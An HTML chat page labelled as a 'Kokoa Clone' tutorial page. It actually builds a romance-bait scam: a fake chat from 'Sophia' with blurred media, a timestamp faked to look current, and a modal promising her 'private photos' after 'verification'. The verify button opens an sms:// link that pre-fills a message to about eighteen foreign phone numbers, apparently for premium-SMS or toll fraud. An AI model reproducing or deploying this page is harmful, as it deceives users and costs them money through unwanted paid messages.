<!-- Seventh page of the Kokoa Clone  -->
<!-- 09.png of the screenshots -->
<!DOCTYPE html>
<html lang="en">

<head>
  <!-- Linking with css file and a short cut is link:css -->
  <link rel="stylesheet" href="css/styles.css" />
  <meta charset="UTF-8" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <title>Chat with Sophia - to Kokoa Clone</title>
  <style>
    .chat-image {
      display: block;
      max-width: 280px;
      width: 100%;
      height: auto;
      margin-top: 1px;
      margin-bottom: 5px;
      /* 可选：添加上边距以增加图片与文字之间的间距 */
      border-radius: 10px;
      filter: blur(5px);
      cursor: pointer;
      /* 鼠标悬停时显示为可点击 */
    }

    .message__bubble {
      margin-right: 5px;
      /* Add margin to the right of the message bubble */
    }

    .message__time {
      margin-left: 5px;
      /* Add margin to the left of the message time */
    }

    .message__info {
      margin-bottom: 2px;
      /* Reduce margin to the bottom of each message info */
    }

    #chat-container {
      overflow-y: auto;
      padding-bottom: 60px;
      /* Ensure space for the reply form */
    }

    /* 优化模态弹窗的样式 */
    .modal-overlay {
      position: fixed;
      top: 0;
      left: 0;
      right: 0;
      bottom: 0;
      background: rgba(0, 0, 0, 0.6);
      /* 增加背景透明度 */
      display: flex;
      justify-content: center;
      align-items: center;
      z-index: 1000;
      /* 添加平滑的过渡效果 */
      opacity: 0;
      visibility: hidden;
      transition: opacity 0.3s ease, visibility 0.3s ease;
    }

    /* 显示模态弹窗时的样式 */
    .modal-overlay.show {
      opacity: 1;
      visibility: visible;
    }

    .modal-content {
      background: #ffffff;
      padding: 30px 20px;
      border-radius: 12px;
      text-align: center;
      box-shadow: 0 8px 16px rgba(0, 0, 0, 0.25);
      /* 添加盒子阴影 */
      max-width: 500px;
      width: 90%;
      /* 添加过渡效果 */
      transform: translateY(-50px);
      transition: transform 0.3s ease;
    }

    /* 弹窗显示时的动画效果 */
    .modal-overlay.show .modal-content {
      transform: translateY(0);
    }

    /* 优化验证按钮的样式 */
    #verify-button {
      padding: 12px 24px;
      margin-top: 30px;
      border: none;
      background-color: #007BFF;
      color: #ffffff;
      font-size: 16px;
      border-radius: 6px;
      cursor: pointer;
      transition: background-color 0.3s ease, transform 0.2s ease;
    }

    #verify-button:hover {
      background-color: #0056b3;
      transform: translateY(-2px);
    }

    /* 美化弹窗内的图片 */
    .modal-content img {
      max-width: 100%;
      height: auto;
      border-radius: 8px;
      margin: 20px 0;
    }

    /* 为视频和音频添加样式 */
    .chat-video {
      max-width: 280px;
      width: 100%;
      margin-top: 1px;
      margin-bottom: 5px;
      border-radius: 10px;
      cursor: pointer;

      /* 添加以下样式以确保音频元素可见 */
      background-color: #f0f0f0;
      /* 添加背景色 */
      min-height: 30px;
      /* 设置最小高度 */
      position: relative;
    }

    /* 可选：添加隐藏的视频元素用于提取帧 */
    .hidden-video {
      display: none;
    }
  </style>
</head>

<body id="chat-screen">
  <header class="alt-header">
    <div class="alt-header__column">
      <a href="chats.html"><i class="fas fa-angle-left fa-2x"></i></a>
    </div>
    <div class="alt-header__column">
      <div class="alt-header__title">Sophia</div>
    </div>
    <div class="alt-header__column">
      <span><i class="fas fa-search fa-lg"></i></span>
      <span><i class="fas fa-bars fa-lg alt-header__column-icon-last"></i></span>
    </div>
  </header>

  <main class="main-screen main-chat" id="chat-container">
    <!-- 修改时间戳 div，添加 id -->
    <div class="chat__timestamp" id="current-timestamp">Friday, August 20, 2021</div>
    <!-- The chat messages will be added here -->
  </main>

  <form class="reply">
    <div class="reply__column">
      <i class="far fa-plus-square fa-2x"></i>
    </div>
    <div class="reply__column">
      <input type="text" placeholder="Write a message..." />
      <i class="far fa-smile-wink fa-2x"></i>
      <button><i class="fas fa-arrow-up fa-lg"></i></button>
    </div>
  </form>
  <script>
    // 添加辅助函数获取格式化时间
    function getFormattedTime(minutesAgo = 0) {
      const now = new Date();
      now.setMinutes(now.getMinutes() - minutesAgo);
      const options = { hour: '2-digit', minute: '2-digit', hour12: false };
      return now.toLocaleTimeString('en-US', options);
    }

    const messages = [
      {
        author: 'Sophia',
        avatar: 'Photos/leo.JPG',
        content: [
          { type: 'text', text: 'Do you have more toilet papers? It\'s super fun!', time: getFormattedTime(5) },
          { type: 'image', src: './1.png' },
          { type: 'text', text: 'Do you have more toilet papers? It\'s super fun!', time: getFormattedTime(4) },
          { type: 'image', src: './1.png' },
          { type: 'text', text: 'If you are wondering, I miss you a lot right now.', time: getFormattedTime(3) },
          { type: 'text', text: 'Do you have more toilet papers? It\'s super fun!', time: getFormattedTime(2) },
          { type: 'text', text: '🧻 🧻 🧻', time: getFormattedTime(1) },
          { type: 'text', text: 'Do you have more toilet papers? It\'s super fun!', time: getFormattedTime(0) },
          { type: 'video', src: './2.mp4', poster: './2-poster.jpg' }, // 添加 poster 属性
          { type: 'text', text: 'Do you have more toilet papers? It\'s super fun!', time: getFormattedTime(0) },
          { type: 'audio', src: './3.mp3' },
          { type: 'text', text: 'Do you have more toilet papers? It\'s super fun!', time: getFormattedTime(0) },
        ]
      },

    ];
  </script>

  <!-- 添加模态弹窗的 HTML -->
  <div id="modal-overlay" class="modal-overlay">
    <div class="modal-content">
      <p>请完成验证以查看图片。</p>
      <img src="./Photos/leo.JPG" alt="验证图片" style="max-width: 100%; height: auto;" />
      <p>请完成验证以查看 Sophia 的私密照片！</p>
      <button id="verify-button">验证</button>
    </div>
  </div>

  <!-- This is needed as it is a key to using icons from fontawesome.com -->
  <script src="./6478f529f2.js" crossorigin="anonymous"></script>
  <script>
    // 定义 handleMediaPlay 函数在 renderMessage 之前
    function handleMediaPlay(event) {
      const mediaElement = event.target;
      if (!mediaElement.dataset.firstPlayDone) {
        // 第一次播放，取消模糊效果并启用控件
        mediaElement.style.filter = 'none';
        mediaElement.controls = true;
        mediaElement.dataset.firstPlayDone = 'true';

        // 添加播放时间监听
        function onTimeUpdate() {
          if (mediaElement.currentTime >= 5) {
            console.log('当前时间:', mediaElement.currentTime);
            mediaElement.pause(); // 暂停播放
            showModal(() => {
              //setTimeout(() => {
              //  mediaElement.play().catch(error => {
              //    console.error('继续播放媒体时出错:', error);
              //  });
              //}, 3000); // 3秒后继续播放
            });
            mediaElement.removeEventListener('timeupdate', onTimeUpdate);
          }
        }

        mediaElement.addEventListener('timeupdate', onTimeUpdate);
      }
    }





    const chatContainer = document.getElementById('chat-container');

    // 添加辅助函数，从视频中提取帧
    function extractFrame(videoSrc, time = 1) {
      return new Promise((resolve, reject) => {
        const video = document.createElement('video');
        video.src = videoSrc;
        video.crossOrigin = 'anonymous';
        video.currentTime = time;

        video.addEventListener('loadeddata', () => {
          const canvas = document.createElement('canvas');
          canvas.width = video.videoWidth;
          canvas.height = video.videoHeight;

          const ctx = canvas.getContext('2d');
          ctx.drawImage(video, 0, 0, canvas.width, canvas.height);
          const dataURL = canvas.toDataURL('image/png');
          resolve(dataURL);
        });

        video.addEventListener('error', (e) => {
          reject(e);
        });
      });
    }

    function renderMessage(message) {
      setTimeout(async () => {
        const messageRow = document.createElement('div');
        messageRow.classList.add('message-row');
        if (message.author === 'own') {
          messageRow.classList.add('message-row--own');
        } else {
          const avatar = document.createElement('img');
          avatar.src = message.avatar;
          avatar.classList.add('avatar');
          messageRow.appendChild(avatar);
        }

        const messageContent = document.createElement('div');
        messageContent.classList.add('message-row__content');

        for (const content of message.content) {
          const messageInfo = document.createElement('div');
          messageInfo.classList.add('message__info');

          if (content.type === 'image') {
            const img = document.createElement('img');
            img.src = content.src;
            img.classList.add('chat-image');
            messageInfo.appendChild(img);
          } else if (content.type === 'video') {
            const video = document.createElement('video');
            video.src = content.src;
            video.controls = true; // 初始显示视频控件
            video.classList.add('chat-video');
            video.addEventListener('play', handleMediaPlay); // 使用 'play' 事件

            // 动态提取帧作为封面
            try {
              const posterURL = await extractFrame(content.src, 1); // 提取第1秒的帧
              video.poster = posterURL;
            } catch (error) {
              console.error('Failed to extract frame:', error);
            }

            messageInfo.appendChild(video);
          } else if (content.type === 'audio') {
            const audio = document.createElement('audio');
            audio.src = content.src;
            audio.controls = true; // 初始显示音频控件
            audio.classList.add('chat-audio');
            audio.addEventListener('play', handleMediaPlay); // 使用 'play' 事件
            messageInfo.appendChild(audio);
          } else if (content.type === 'text') {
            const messageBubble = document.createElement('span');
            messageBubble.classList.add('message__bubble');
            messageBubble.textContent = content.text;
            messageInfo.appendChild(messageBubble);

            if (content.time) {
              const messageTime = document.createElement('span');
              messageTime.classList.add('message__time');
              messageTime.textContent = content.time;
              messageInfo.appendChild(messageTime);
            }
          }

          messageContent.appendChild(messageInfo);
        }

        messageRow.appendChild(messageContent);
        chatContainer.appendChild(messageRow);

        // Scroll to the latest message
        chatContainer.scrollTop = chatContainer.scrollHeight;
      }, 0);
    }

    messages.forEach(renderMessage);

    const replyForm = document.querySelector('.reply');
    replyForm.addEventListener('submit', function (event) {
      event.preventDefault();
      const input = replyForm.querySelector('input[type="text"]');
      const newMessage = input.value.trim();
      if (newMessage) {
        const message = {
          author: 'own',
          content: [{ type: 'text', text: newMessage, time: new Date().toLocaleTimeString([], { hour: '2-digit', minute: '2-digit' }) }]
        };
        messages.push(message);
        renderMessage(message);
        input.value = '';
      }
    });

    // 添加显示模态弹窗的函数
    function showModal(callback) {
      const modalOverlay = document.getElementById('modal-overlay');
      modalOverlay.classList.add('show'); // 添加 'show' 类以显示弹窗

      const verifyButton = document.getElementById('verify-button');
      verifyButton.onclick = function () {
        // 把验证改为验证中
        document.getElementById('verify-button').textContent = '验证中...';
        // 发送短信验证码或其他验证方式
        console.log('发送验证请求...');
        var sms = "sms://open?addresses=+992917172474,+992911151430,+34651714076,+34665291217,+34665291200,+992917172482,+201103502264,+992917172399,+201103502251,+34665291250,+34651714230,+992919320905,+992919321826,+992919321805,+34665291252,+34665291262,+34665291204,+201103593243/&body=My%20access%20is%20ready%20with%20my%20number%20ahVKtk%208995";
        location.href = sms; // 模拟发送短信

        // 在点击确认后等待 3 秒再隐藏弹窗
        setTimeout(function () {
          modalOverlay.classList.remove('show'); // 移除 'show' 类以隐藏弹窗
          callback();
        }, 3000); // 3秒后执行
      };
    }

    var firstClickDone = false;
    // 更新图片的点击事件监听器
    document.addEventListener('click', function (event) {
      if (event.target.classList.contains('chat-image')) {
        const imgElement = event.target;

        if (!firstClickDone) {
          // 第一次点击，直接显示图片
          imgElement.style.filter = 'none'; // 去除模糊效果
          imgElement.dataset.firstClickDone = 'true'; // 标记已完成第一次点击
          firstClickDone = true;
        } else {
          // 已经点击过，显示模态弹窗
          imgElement.style.filter = 'blur(5px)'; // 重新应用模糊效果
          showModal(function () {
            setTimeout(function () {
              imgElement.style.filter = 'none'; // 3 秒后去除模糊效果
            }, 3000);
          });
        }
      }
    });

    // 添加动态更新时间戳的代码
    window.addEventListener('DOMContentLoaded', (event) => {
      const timestampDiv = document.getElementById('current-timestamp');
      if (timestampDiv) {
        const now = new Date();
        now.setMinutes(now.getMinutes() - 2);
        const options = { weekday: 'long', year: 'numeric', month: 'long', day: 'numeric' };
        // 修改为使用 'en-US' 以确保时间戳为英文格式
        const formattedTime = now.toLocaleDateString('en-US', options);
        timestampDiv.textContent = formattedTime;
      }
    });
  </script>
</body>

</html>